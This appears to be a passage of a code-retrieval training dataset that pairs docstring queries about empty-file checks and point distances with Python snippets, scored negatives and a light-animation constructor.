index2:\n \t\t\toutput_list = [temp_dist[0], temp_dist[1], temp_dist[2]] \t\n return tuple(output_list)", "def get_closest_waypoint(self, pose, waypoints):\n #TODO implement\n\n\tmin_dist = float(\"inf\")\n\tclosest_wp_idx = -1\t\n\n for idx, wp in enumerate(waypoints):\n\t\tdist = self.dist_to_point(pose, wp.pose.pose)\n\t\tif(dist < min_dist):\n\t\t\tmin_dist = dist\n\t\t\tclosest_wp_idx = idx\n\treturn closest_wp_idx", "def calc_dist(self, points): \n dist_x = [self._current_pose.position.x - p.pose.position.x for p in points]\n dist_y = [self._current_pose.position.y - p.pose.position.y for p in points]\n dist = np.hypot(dist_x,dist_y) \n if len(dist) > 0:\n return min(dist) \n else: \n return 0", "def point_distances(self, params=None):\n if params is None:\n params = self.collocation_points()\n with self.fix_evaluator():\n pts = np.array([self(la) for la in params])\n deltas = np.diff(pts, axis=0)\n distances = norm(deltas, axis=1)\n return distances", "def get_best_distances(distances, points_base, points_compare):\n indexes = get_interbreeding_indexes(2, including_same=True, cross=True)\n\n for i in range(len(indexes)):\n distance = calculate_distance(\n points_base[indexes[i][0]],\n points_compare[indexes[i][1]]\n )\n\n if distance < distances[indexes[i][0]]:\n distances[indexes[i][0]] = distance\n\n return distances", "def closest_fruit(maze, currX, currY, fruit_list):\n curr_min = sys.maxsize\n for position in fruit_list:\n distance = Astar(maze, currX, currY, position[0], position[1])\n if distance < curr_min:\n curr_min = distance\n return curr_min", "def find_closest_intersections(wire_data):\n\n # Find the intersection of the two lists\n intersections = find_intersections(wire_data)\n\n # For each intersection measure distance from the centre\n dists = [abs(point[0]) + abs(point[1]) for point in intersections]\n\n return min(dists)", "def __iter__(self):\r\n curpt, done = [0,0], numpy.zeros(self.shape, dtype='bool')\r\n while not done.all():\r\n #The following line computes the nearest remaining point...\r\n closest = numpy.unravel_index((numpy.where(done, numpy.inf,\r\n (numpy.sum((self.points - curpt)**2, axis=-1))) if\r\n self.smartiter else done).argmin(), self.shape)\r\n #...but only if self.smartiter is true.\r\n done[closest] = True\r\n curpt = self.points[closest]\r\n yield closest", "def nearest(items, pivot):\n return min(items, key=lambda x: abs(x - pivot))", "def fast_closest_pair(cluster_list):\n num_points = len(cluster_list)\n closest_pair = (float('inf'), -1, -1)\n\n if num_points <= 3:\n return slow_closest_pair(cluster_list)\n else:\n split_point = num_points/2\n left_cluster = [cluster_list[idx_l] for idx_l in range(split_point)]\n right_cluster = [cluster_list[idx_r] for idx_r in range(split_point, num_points)]\n left_best = fast_closest_pair(left_cluster)\n right_best = fast_closest_pair(right_cluster)\n closest_pair = min(left_best,\n (right_best[0], right_best[1] + split_point, right_best[2] + split_point))\n mid_distance = .5*(cluster_list[split_point - 1].horiz_center() + cluster_list[split_point].horiz_center())\n closest_pair = min(closest_pair,\n closest_pair_strip(cluster_list, mid_distance, closest_pair[0]))\n return closest_pair", "def solve(points):\n # it's not a list\n if not isinstance(points, list):\n raise TypeError(\"solve expects a list of n Point objects, received %s\" % points)\n\n plen = len(points)\n if plen < 2:\n return []\n\n # preallocate a simple map to tell us whether a Point is spanned\n spanned = [False] * plen\n # span the first point\n spanned[0] = True\n edges = []\n result = []\n\n for lkey, left in enumerate(points):\n for rkey, right in enumerate(points):\n #if left != right:\n edges.append((lkey, rkey, edist(left, right)))\n\n edges.sort(key=itemgetter(2))\n\n while len(result) < plen - 1:\n for edge in edges:\n lkey, rkey, _ = edge\n if spanned[lkey] != spanned[rkey]:\n result.append((points[lkey], points[rkey]))\n spanned[lkey] = spanned[rkey] = True\n break\n\n return result", "def fit (self,points):\n all_coordinates = [p.coordinates for p in points]\n for i in range(len(all_coordinates[0])):\n if (len(self.min_coordinate)<=i):\n self.min_coordinate.append(all_coordinates[0][i])\n self.max_coordinate.append(all_coordinates[0][i])\n for x in all_coordinates:\n if(self.max_coordinate[i]<x[i]):\n self.max_coordinate[i]=x[i]\n if(self.min_coordinate[i]>x[i]):\n self.min_coordinate[i]=x[i]", "def get_nearest_offgrid_pin(self, pin, insufficient_list):\n # Find the coordinate with the most overlap\n best_coord = None\n best_dist = math.inf\n for coord in insufficient_list:\n track_pin = self.convert_track_to_pin(coord)\n min_dist = pin.distance(track_pin)\n if min_dist<best_dist:\n best_dist=min_dist\n best_coord=coord\n \n return set([best_coord])" ]
[ "0.7746659", "0.7575003", "0.7565495", "0.74907386", "0.73184353", "0.72928536", "0.7258349", "0.722991", "0.6869522", "0.67983764", "0.67398", "0.67391354", "0.67248935", "0.6715504", "0.6708824", "0.66605735", "0.661304", "0.6607124", "0.6598075", "0.659383", "0.65821815", "0.6560994", "0.65261304", "0.6524797", "0.6507839", "0.65025985", "0.6480889", "0.64769864", "0.64741105", "0.6466876", "0.6440018", "0.6425536", "0.6386456", "0.63747317", "0.635754", "0.6353659", "0.63520116", "0.6328228", "0.6297446", "0.6281719", "0.6281122", "0.627367", "0.62498033", "0.62429374", "0.6235604", "0.61935884", "0.6187533", "0.61689883", "0.616461", "0.61604035", "0.6158723", "0.6157153", "0.615465", "0.6153623", "0.614732", "0.6126843", "0.61216885", "0.6114247", "0.6102109", "0.6074916", "0.6050748", "0.60488385", "0.6045505", "0.60425115", "0.6022679", "0.6021309", "0.600924", "0.600888", "0.6003676", "0.60021824", "0.5998458", "0.599551", "0.59934103", "0.59903955", "0.59840316", "0.59791696", "0.5974467", "0.5971627", "0.59624845", "0.5959449", "0.5953791", "0.5953255", "0.5943313", "0.59394544", "0.5938481", "0.5933163", "0.59324676", "0.59321314", "0.5912922", "0.5903189", "0.58978224", "0.5895623", "0.58917284", "0.5891587", "0.58836925", "0.58809114", "0.58716583", "0.58711904", "0.5868928", "0.58656174" ]
0.81107926
0
Tests whether the input file is empty. If input is not empty, it returns the file; otherwise it exits from the system.
def input_file_test(input): try: if os.stat(input).st_size == 0: print ("The input file %s is empty, exiting." % input) sys.exit() except OSError as e: print(e) sys.exit() return input
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_empty_file(self):\n\t\tmain.Main(['input/empty.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/empty.csv'))", "def is_file_empty(file_name):\n # open ile in read mode\n with open(file_name, 'r') as read_obj:\n # read first character\n one_char = read_obj.read(1)\n # if not fetched then file is empty\n if not one_char:\n return True\n return False", "def is_empty(file):\n with open(file, 'rb') as f:\n return not f.read(1)", "def found_empty_file(self):\n self.is_empty = True", "def test_empty_file(self):\n input_file = \"does_not_exist.fasta\"\n self.assertFalse(os.path.isfile(input_file))\n\n cline = XXmotifCommandline(outdir=self.out_dir, seqfile=input_file)\n\n try:\n stdout, stderr = cline()\n except ApplicationError as err:\n self.assertEqual(err.returncode, 255)\n else:\n self.fail(f\"Should have failed, returned:\\n{stdout}\\n{stderr}\")", "def is_file_empty(file_path):\n # Check if file exist and it is empty\n return os.path.exists(file_path) and os.stat(file_path).st_size == 0", "def is_empty_file(fpath):\n return \\\n fpath is not None and \\\n os.path.isfile(fpath) and \\\n os.path.getsize(fpath) == 0", "def test_empty_file(self):\n with open(os.path.join(test_dir, \"empty_file.txt\")) as f:\n for idx, line in enumerate(reverse_readline(f)):\n raise ValueError(\"an empty file is being read!\")", "def file_is_empty(file_name):\n try:\n if os.stat(file_name).st_size > 0:\n return False\n except Exception: # pylint: disable=broad-except\n pass\n\n return True", "def is_valid_file(input_file):\n if not os.path.isfile(input_file):\n print('File \\'{}\\' not found.'.format(input_file))\n exit(1)\n return input_file", "def input_file(path): \n if path is None : \n return None\n else : \n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File {} does not exists.'.format(path))\n return path", "def valid_file(fname):\r\n try:\r\n if os.stat(fname).st_size > 0: # if filename contains data\r\n return \"0\"\r\n else:\r\n return \"Selected file is empty....please reenter\"\r\n except OSError:\r\n return \"Can not find the file....please reenter\"", "def get_existing_file(msg, skip=False):\n inp = None\n while inp is None:\n inp = raw_input(msg)\n if skip and len(inp) == 0:\n return None\n if not os.path.isfile(inp):\n print \"Not a file:\", inp\n inp = None\n return inp", "def get_nonexisting_file(msg, skip=False):\n inp = None\n while inp is None:\n inp = raw_input(msg)\n if skip and len(inp) == 0:\n return None\n if os.path.isfile(inp):\n print \"Is a file:\", inp\n inp = None\n return inp", "def get_filename_as_agrv_if_no_ask(prompt):\n Found = False\n ln = len(sys.argv)\n while not Found:\n if ln < 2:\n file = input( prompt)\n else:\n file = sys.argv[1]\n try:\n RFH = open(file)\n Found = True\n except FileNotFoundError:\n print(\"%%Error! File not found!\")\n ln = 1\n# break\n return RFH", "def test_not_present_file(self):\n\t\ttry:\n\t\t\tmain.Main(['input/abc.txt']).run()\n\t\texcept:\n\t\t\tself.assertTrue(True)", "def get_file():\n # Main Loop\n while True:\n filename = input(\"Please enter the name of the file you want to work on: \")\n # Check if file exists...\n if path.exists(filename):\n print(\"File sucessfully retrieved. Returning to previous menu...\")\n print()\n return filename\n \n print(\"That file does not exist in your current directroy. Try again.\")\n print()", "def test_empty_file(self):\n settings = get_settings(\n PANDOC_EXTENSIONS=PANDOC_EXTENSIONS, PANDOC_ARGS=PANDOC_ARGS\n )\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"empty.md\")\n\n # If the file is empty retrieval of metadata should fail\n with self.assertRaises(Exception) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\"Could not find metadata. File is empty.\", message)", "def check_input_file(value):\n if not os.path.exists(value):\n raise argparse.ArgumentTypeError(f'Input file `{value}` does not exist')\n\n return value", "def test_empty_input_file(self, api_client):\n runner = CliRunner()\n\n expected = (\n \"Error: at least one query must be passed either as an argument \"\n \"(QUERY) or through the -i/--input_file option.\"\n )\n\n result = runner.invoke(\n subcommand.query,\n [\"-i\", StringIO()],\n parent=Context(main, info_name=\"greynoise\"),\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise query\" in result.output\n assert expected in result.output\n api_client.query.assert_not_called()", "def test_empty_input_file(self, api_client):\n runner = CliRunner()\n\n expected = (\n \"Error: at least one query must be passed either as an argument \"\n \"(QUERY) or through the -i/--input_file option.\"\n )\n\n result = runner.invoke(\n subcommand.stats,\n [\"-i\", StringIO()],\n parent=Context(main, info_name=\"greynoise\"),\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise stats\" in result.output\n assert expected in result.output\n api_client.query.assert_not_called()", "def test_the_main_empty_file(self):\r\n with self.assertRaises(SystemExit):\r\n the_main_function(\"testfile_empty_file.csv\")", "def test_read_quotes_empty_file(self):\n path = os.path.join(self.tempdir, \"emptyfile.txt\")\n # Create empty file\n open(path, 'a').close()\n quotes = api.read_quotes(path)\n self.assertEqual(0, len(quotes))", "def get_input_file():\n if len(sys.argv) < 3:\n return -1\n return sys.argv[2]", "def test_emptyfile():\n\n # check with an empty, open file-like object.\n a = bedparser.bedfile(StringIO(''))\n a = list(a)\n assert len(a)==0\n \n # now check with a filename.\n a = bedparser.bedfile('inputfiles/empty.bed')\n a = list(a)\n assert len(a) == 0", "def AskForFileName():\n file_doesnot_exsit = True\n file_name = None\n while file_doesnot_exsit:\n try:\n file_name = input(\"What is the name of the input file?\")\n file = open(file_name, 'r')\n file_doesnot_exsit = False\n except FileNotFoundError:\n print(\"File is not found\")\n return file_name", "def prune_empty(self): # FileObj.prune_empty\n return False # can't prune a file", "def is_input_file(self):\r\n return self.depth == 0", "def askInputFile():\n while True:\n print(\"Enter a valid .txt file\")\n # Try until a plain-text file is provided.\n try:\n fileName = easygui.fileopenbox(\"Enter a .txt file\",\n \"Open file\",\n default=\"C:\\\\\",\n filetypes=[\"*.txt\"])\n if fileName == None:\n raise \n except :\n pass\n else:\n return fileName", "def checkforfile(filename):\r\n try:\r\n inputlist =[]\r\n with open(filename,'ra') as fin:\r\n reader = csv.reader(fin)\r\n for row in reader:\r\n if row[0]!= '':\r\n inputlist.append(row)\r\n print (\" File Exists. It has \", len(inputlist), \" number of entries\" ) \r\n \r\n except IOError as (errno, strerror):\r\n print (\"IOError : ({0}) : {1}\".format(errno, strerror))\r\n\r\n finally:\r\n fin.close()\r\n return inputlist", "def file_populated(filepath):\n\n return file_exists(filepath) and os.stat(filepath).st_size > 0", "def test_check_if_output_file_exists():\n input_file = os.path.join(os.getcwd(), 'tests', 'input_test_file.docx')\n output_file = os.path.join(os.getcwd(), 'tests', 'output_test_file.txt')\n\n questions_parser = QuestionsParser()\n questions_parser.main(argv=['-i', input_file, '-o', output_file])\n assert os.path.exists(output_file)\n os.unlink(output_file)", "def validate_input_file(self):\r\n return os.path.isfile(self.input_file)", "def test_empty_file(self):\n\n temp = tempfile.NamedTemporaryFile()\n temp.flush()\n self.assertRaises(MalformedFileError, NBTFile, temp.name)", "def fileCheck(file):\n if not os.path.isfile(file):\n print('File : ',file)\n print('E... '+'no file')\n sys.exit()", "def input_file(path):\n\n path = os.path.abspath(path)\n if not os.path.exists(path):\n raise IOError('File %s does not exist.' % path)\n return path", "def existing_file(value):\n is_file = os.path.isfile(value)\n if value == \"\" or not is_file:\n argparse.ArgumentTypeError(\n \"Must specify an existing file for input\")\n return value", "def open_file():\r\n the_file = input (\"Enter a file name: \")\r\n while True:\r\n try: \r\n fp = open (the_file, \"r\")\r\n return fp\r\n except FileNotFoundError:\r\n the_file = input (\"Error. Enter a file name: \")", "def check(self, workspace: Workspace, u_file: UserFile) \\\n -> UserFile:\n if u_file.is_empty and not u_file.is_directory:\n workspace.add_error(u_file, self.ZERO_LENGTH,\n self.ZERO_LENGTH_MESSAGE % u_file.name,\n severity=Severity.INFO, is_persistant=False)\n workspace.remove(u_file, self.ZERO_LENGTH_MESSAGE % u_file.name)\n return u_file", "def read_or_exit(file_path):\n try:\n data = serialize.read(file_path)\n return data\n except IOError:\n print('ERROR: File does not exist or is invalid: {}'.format(file_path))\n exit(1)", "def read_full_file(self, filename):\n output_file = os.path.join(OUTPUT_PATH, filename)\n data_out = ''\n if os.path.exists(output_file):\n fid = open(output_file, 'rb')\n data_out = fid.read()\n fid.close()\n else:\n print('No file %s', filename)\n return data_out", "def get_filename():\n filename = input(\"Filename? \")\n while not filename:\n filename = input(\"Filename? \")\n return filename", "def check_for_preexisting_output_file(output_file_path):\n if path.exists(f\"{output_file_path}\"):\n print(\"Output file at specified save location file path already exists!\")\n print(\"Aborting operation!\")\n sys.exit()", "def test_missing_file():\n\n rv, out = getstatusoutput(f'{prg} -o {outfile}')\n assert rv != 0\n assert re.search('the following arguments are required: -f/--file', out)", "def existent_file(file_path):\n if not os.path.exists(file_path):\n raise argparse.ArgumentTypeError(\"Input file path does not exist\")\n return file_path", "def check_input_file(self):\n\n # Mission critical parameters\n if self.jobname is None:\n sys.exit('Batch_emto.check_input_file: \\'jobname\\' has to be given!')\n\n if self.runtime is None:\n self.runtime = \"48:00:00\"\n if self.emtopath is None:\n self.emtopath = \"./\"\n if self.EMTOdir is None:\n self.EMTOdir = \"$HOME/EMTO5.8/\"\n if self.runKGRN is None:\n self.runKGRN = True\n if self.runKFCD is None:\n self.runKFCD = True\n return", "def get_filename():\n filename = None\n while filename is None:\n filename = input(\"Enter a data file name: \")\n if not os.path.isfile(filename): #if the file doesn't exist\n print(\"Invalid File Name Entered!\")\n filename = None\n \n infile = open(filename)\n lines = infile.readlines()\n infile.close()\n return (lines, filename)", "def test_parse_empty_file(self):\n bin.parser.parse_file(None, self.mock_db, self.tf, False)", "def file_from_user():\n try:\n file = get_input(\"Please enter name of the file to get data from. For exit press 0: \")\n if file == \"0\":\n sys.exit()\n LocationList.add_location(read_from_csv(file))\n except FileNotFoundError:\n print(\"\\nThis file wasn't found. Try again or press 0 to exit.\\n\")\n file_from_user()", "def is_empty(self):\n if self.file_exists:\n with open_hdf5(self.file_name) as h:\n return len(h.keys()) == 0\n else:\n return True", "def get_message():\n message = None\n while not message:\n message_location = input(\"Input the message file: \")\n try:\n with open(message_location) as input_file:\n message = input_file.read()\n except FileNotFoundError:\n print(f\"{message_location} not found\")\n print(message)\n return message", "def isempty(self):\n\t\tif self.empty is None:\n\t\t\tempty = 1\n\t\t\tfor status in self:\n\t\t\t\tif isinstance (status.fsObj, JloFile):\n\t\t\t\t\tempty = 0\n\t\t\t\t\tbreak\n\t\t\tif empty == 1:\n\t\t\t\tfor status in self:\n\t\t\t\t\tif isinstance (status.fsObj, WorkingDirectory):\n\t\t\t\t\t\tif not status.fsObj.selected.isempty():\n\t\t\t\t\t\t\tempty = 0\n\t\t\t\t\t\t\tbreak\n\t\t\tself.empty = empty\n\t\treturn self.empty", "def check_file_location(file_path):\n\n\tp = pathlib.Path(file_path)\n\tif p.is_file():\n\t\t#if file exist but empty, remove it and call again start method\n\t\tif os.stat(file_path).st_size == 0:\n\t\t\tos.remove(file_path)\n\t\t\tstart()\n\t\telse:\t\n\t\t\treturn True\n\telse:\n\t\treturn False", "def test_ignore_empty_files(self):\n\n self.checker.config.file_header_ignore_empty_files = True\n node_mock = MagicMock()\n node_mock.stream.return_value.__enter__.return_value.read.return_value.decode.return_value = ''\n with self.assertNoMessages():\n self.checker.process_module(node_mock)", "def eof_check(self) -> bool:\n eof = False\n curr_pos = self.fileobject.tell()\n # print(curr_pos, self.st_size)\n chunk = self.fileobject.read(25)\n if chunk == '':\n # Is there something on the back burner??\n if len(self._backburner) > 0:\n self.fileobject = self._backburner.pop()\n # TODO: what if it is the end of the back burner file? Is that handled?\n else:\n eof = True\n else:\n self.fileobject.seek(curr_pos)\n return eof", "def is_valid_file(parser, arg):\n if not os.path.exists(arg):\n parser.error(\"The file %s does not exist!\" % arg)\n else:\n return arg", "def open_infile(infilename):\n if not infilename or infilename == \"-\":\n return sys.stdin\n else:\n return open(infilename, \"r\")", "def open_input_file(input_file):\n if input_file:\n if not os.path.isfile(input_file):\n sys.stderr.write(\n \"ERROR! Input file (%s) is not a normal file.\\n\" % input_file)\n sys.exit(1)\n try:\n return codecs.open(input_file, \"r\", \"utf8\")\n except:\n sys.stderr.write(\n \"ERROR! Could not open input file (%s) for reading:\\n\" % input_file)\n raise\n else:\n return sys.stdin", "def get_source_file(size, working_directory, clean=False):\n\n filename = str(size)+'mb.file'\n file_path = working_directory+os.path.sep+filename\n\n if clean:\n try:\n os.remove(file_path)\n except OSError:\n pass\n\n logger.debug(\"Checking whether input file exists: %s\", file_path)\n if not os.path.exists(file_path):\n logger.info(\"Creating file: %s\", file_path)\n os.system(\"head -c \"+str(size)+\"M < /dev/urandom > \"+file_path)\n\n return file_path", "def exists_not_empty(path):\n if os.path.exists(path) and os.stat(path).st_size > 0:\n return True\n else:\n return False", "def test_do_not_ignore_empty_files(self):\n\n node_mock = MagicMock()\n node_mock.stream.return_value.__enter__.return_value.read.return_value.decode.return_value = ''\n with self.assertAddsMessages(pylint.testutils.Message(\n msg_id='invalid-file-header',\n line=1,\n args=self.EXPECTED_HEADER)):\n self.checker.process_module(node_mock)", "def check_empty_desc_file(out):\n return MISSING_RESOURCE in out.lower()", "def test_non_empty_file_no_metadata(self):\n settings = get_settings(\n PANDOC_EXTENSIONS=PANDOC_EXTENSIONS, PANDOC_ARGS=PANDOC_ARGS\n )\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"no_metadata.md\")\n\n # If the file is not empty but has no metadata it should fail\n with self.assertRaises(Exception) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n \"Could not find metadata header '...' or '---'.\", message\n )", "def get_valid_filename(msg):\r\n\r\n filename = input(msg)\r\n while not os.path.exists(filename):\r\n print(\"That file does not exist.\")\r\n filename = input(msg)\r\n return filename", "def verify_file_exists(device, file, size=None, dir_output=None):\n\n filename = os.path.basename(file)\n directory = ''.join([os.path.dirname(file), '/'])\n dir_out = device.parse('ls -l {}'.format(directory), output=dir_output)\n exist = filename in dir_out.get('files', {})\n\n # size not provided, just check if file exists\n if not exist:\n log.info(\"File '{}' does not exist.\".format(file))\n return exist\n elif not size:\n log.info(\"File name '{}' exists\".format(file))\n return exist\n\n # File exists and check size\n file_size = int(dir_out.get('files', {}).get(filename, {}).get('size', -1))\n log.info(\n \"Expected size: {} bytes, Actual size : {} bytes\".format(\n size if size > -1 else 'Unknown',\n file_size if file_size > -1 else 'Unknown'))\n\n if size > -1 and file_size > -1:\n return size == file_size\n else:\n log.warning(\"File name '{}' exists, but could not verify the file size\".format(\n file))\n return True", "def f_is_empty(self):\n raise NotImplementedError(\"Implement this!\")", "def ofile_handle(self):\n if not self.status == \"finished\":\n raise NameError(\"redhawk: unfinished ofile check\")\n tries = 0\n while not self.ofile_exists() and tries < self.file_limit:\n time.sleep(self.file_delay)\n tries = tries+1\n \n if os.path.isfile(self.ofile_name()):\n return open(self.ofile_name(), \"r\")\n\n raise NameError(\"redhawk: unfound ofile\")", "def test_empty(self):\n self.assertFalse(os.path.exists('/'))", "def get_path():\n\n output_path = None\n while output_path is None:\n print question + \"Please enter the directory where you would like the file saved?\"\n output_path = raw_input()\n if os.path.isdir(os.path.expanduser(output_path)):\n pass\n else:\n os.system('clear')\n print warn + \"%s is not valid, please try again: \" % str(output_path)\n output_path = None\n return os.path.expanduser(output_path)", "def safe_open(filename, mode, return_none=False, zap=False):\n if 'w' in mode and os.path.exists(filename) and not zap:\n rounder_logger.error(\"ABORT: Output file exists '{}'. Please delete \"\n \"or rename the file and restart the program\".format(filename))\n if return_none:\n return None\n sys.exit(1)\n return open(filename, mode)", "def test_empty_file(self):\n field = TypedFileField(required=False)\n for v in EMPTY_VALUES:\n assert field.clean(v) is None", "def f_is_empty(self):\n return self._data is None", "def bulbs_empty():\n check50.run(\"./bulbs\").stdin(\"\").stdout(\"\").exit(0)", "def get_valid_path(file_path: Path, prompt_title: str=\"PATH TO FILE\") -> Path:\n\n print(f\"{Color.EMPHASIS}{prompt_title}{Color.END}\")\n while True:\n if file_path.exists() and file_path.is_file():\n return file_path\n else:\n file_path = Path(input(f\"{Color.INFORMATION}Enter the file's path: {Color.END}\"))", "def filecheck(filename):\n if not os.path.isfile(filename):\n print(\"Can't find %s\" % filename)\n exit(1)\n else:\n return filename", "def nofile(filename):\n if not os.path.isfile(filename):\n return True\n else:\n return False", "def input_file(self):\n if not self.input_file_generated():\n return None\n if self.input_static is False:\n return self._input_generated_file\n else:\n return self._input_uploaded_file", "def is_nonempty_analysis(self, path):\r\n if not os.path.exists(path):\r\n return False\r\n empty_prefix = self.empty_prefix()\r\n with open(path, 'r') as infile:\r\n prefix = infile.read(len(empty_prefix))\r\n return prefix != empty_prefix", "def get_input_file() -> Path:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"GZIPED_FILE\", help=\"gziped file for this problem\")\n args = parser.parse_args()\n return Path(args.GZIPED_FILE)", "def _consume_blanklines(self):\n while True:\n line = self.reader.readline()\n if len(line) == 0:\n return None\n\n if line.rstrip() == '':\n self.offset = self.fh.tell() - self.reader.rem_length()\n continue\n\n return line", "def is_empty():\n try:\n command(\"T\")\n except EppException:\n return False\n else:\n return True", "def test_get_infile(self):\r\n pass # not practically testable, but obvious file I/O\r", "def open_input(self, fn):\n\treturn (None, None)", "def FileCheck(fn):\n try:\n open(fn, \"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def is_empty(x):\n\n if not x:\n return None\n else:\n return x", "def is_valid_file(parser, arg):\n\n if not os.path.isfile(arg):\n parser.error('The file {} does not exist!'.format(arg))\n else:\n return arg", "def file_missing(filename):\n return not os.path.isfile(filename)", "def f_is_empty(self):\n return len(self._data) == 0", "def _check_for_incomplete_input(self):\n pass", "def fileCheck(filename):\n if not os.path.isfile(filename):\n print('File: ' + filename + ' not found. Exiting...', file=sys.stderr)\n sys.exit(1)", "def checkFile(self,selected_file):\n path_holder = pathlib.Path(selected_file)\n if path_holder.exists():\n if path_holder.is_file():\n if path_holder.stat().st_size == 0 or path_holder.stat().st_size is None:\n raise CoreException.FileEmptyError(\"File should not be empty!\")\n return False\n\n if path_holder.is_symlink():\n raise CoreException.FileNotSupportedError(\"Symbolic link not supported\")\n return False\n \n # File Clean if they pass the required identity of file.\n return True", "def test_reject_empty(self):\n self.spawn(\"./binary\").stdin(\"\").reject()", "def is_valid_file(args):\n if args.file is not None:\n return True\n return False", "def read_input(args, parser):\n if args.text == sys.stdin:\n # check if stdin is empty\n stdin_ready, _, _ = select.select([sys.stdin], [], [], 0)\n if stdin_ready:\n return sys.stdin.read().strip()\n\n parser.print_help()\n sys.exit(1)\n\n return args.text", "def test_getFilenameEmpty(self):\n result = self.client._getFilename(' ')\n\n self.assertEqual(('', ''), result)", "def _read_input_file(self):\n pass", "def check_input(args):\n\n # Defaults\n option = ''\n fh = sys.stdin # file handle\n\n if not len(args):\n # Reading from pipe with default option\n if sys.stdin.isatty():\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n elif len(args) == 1:\n # One of two options: option & Pipe OR file & default option\n if args[0].startswith('-'):\n option = args[0][1:]\n if sys.stdin.isatty(): # ensure the PDB data is streamed in\n emsg = 'ERROR!! No data to process!\\n'\n sys.stderr.write(emsg)\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n else:\n if not os.path.isfile(args[0]):\n emsg = 'ERROR!! File not found or not readable: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[0]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n fh = open(args[0], 'r')\n\n elif len(args) == 2:\n # Two options: option & File\n if not args[0].startswith('-'):\n emsg = 'ERROR! First argument is not an option: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[0]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n if not os.path.isfile(args[1]):\n emsg = 'ERROR!! File not found or not readable: \\'{}\\'\\n'\n sys.stderr.write(emsg.format(args[1]))\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n option = args[0][1:]\n fh = open(args[1], 'r')\n\n else: # Whatever ...\n sys.stderr.write(__doc__)\n sys.exit(1)\n\n # Validate option\n if len(option) > 1:\n emsg = 'ERROR!! Alternate location identifiers must be single '\n emsg += 'characters: \\'{}\\''\n sys.stderr.write(emsg.format(option))\n sys.exit(1)\n\n return (option, fh)", "def test_no_eof(self):", "def check_file_flag(file):\n return process_file_flag(file, None)", "def get_file_chunk(self):\n chunk = self.infile.read(self.CHUNK_SIZE)\n if len(chunk) == 0:\n return None\n return chunk" ]
[ "0.68083346", "0.68074083", "0.6786199", "0.67231107", "0.6606845", "0.6573466", "0.65498596", "0.6435035", "0.6296949", "0.6270471", "0.6231167", "0.62046707", "0.61650205", "0.61614615", "0.5990059", "0.58732206", "0.5847673", "0.58417505", "0.5835229", "0.5767335", "0.5743112", "0.57389253", "0.5715131", "0.57133245", "0.57009304", "0.5674514", "0.56160665", "0.5581818", "0.5517408", "0.55089784", "0.55087185", "0.55065066", "0.5503673", "0.54978627", "0.5482728", "0.5457088", "0.54386926", "0.53599465", "0.53463113", "0.5341236", "0.5332263", "0.5324712", "0.5303268", "0.5301716", "0.52993166", "0.52770364", "0.5270631", "0.52631235", "0.52392924", "0.5219671", "0.52173156", "0.52145314", "0.51942164", "0.5167415", "0.51614195", "0.51501244", "0.5146996", "0.5140475", "0.5135851", "0.5124498", "0.51210564", "0.5115838", "0.5104123", "0.50977165", "0.5074384", "0.5070584", "0.5070329", "0.50689656", "0.5065357", "0.5063039", "0.50623125", "0.50598437", "0.5053466", "0.50531805", "0.50521106", "0.50481206", "0.5044508", "0.5043552", "0.5042728", "0.5042656", "0.50410783", "0.50339913", "0.5032774", "0.50300735", "0.50207466", "0.5014487", "0.49995273", "0.4997944", "0.49966508", "0.49919346", "0.49801272", "0.49753392", "0.49631226", "0.49585974", "0.49563372", "0.49424553", "0.49361137", "0.49330163", "0.49265695", "0.49189025" ]
0.88009804
0
Arguments speeds speed to move the light across the entire string
def __init__(self, layout, *, count=3, speeds=DEFAULT_SPEED, bounds=None, positions=None, colors=None, widths=None, shapes='linear', accelerations=None, background_color=util.colors.Black, **kwds): super().__init__(layout, **kwds) self.background_color = background_color self.count = count if not positions: if count == 1: positions = [1 / 2] else: positions = [i / (count) for i in range(count)] if not widths: widths = [1 / (2 * count)] accelerations = accelerations or [0] if not isinstance(speeds, (list, tuple)): speeds = [speeds] if not isinstance(accelerations, (list, tuple)): accelerations = [accelerations] if not isinstance(widths, (list, tuple)): widths = [widths] if not isinstance(shapes, (list, tuple)): shapes = [shapes] if not isinstance(positions, (list, tuple)): positions = [positions] if not colors: if count == 1: colors = [util.colors.Yellow] else: colors = [wheel.wheel_helper(p, 1, 0) for p in positions] colors = [(2 * r, 2 * g, 2 * b) for r, g, b in colors] n = len(self.color_list) bounds = bounds or [(0, 1)] A = speeds, accelerations, bounds, positions, colors, widths, shapes def make_light(i): return light.Light(self.color_list, *[a[i % len(a)] for a in A]) self.lights = [make_light(i) for i in range(count)]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
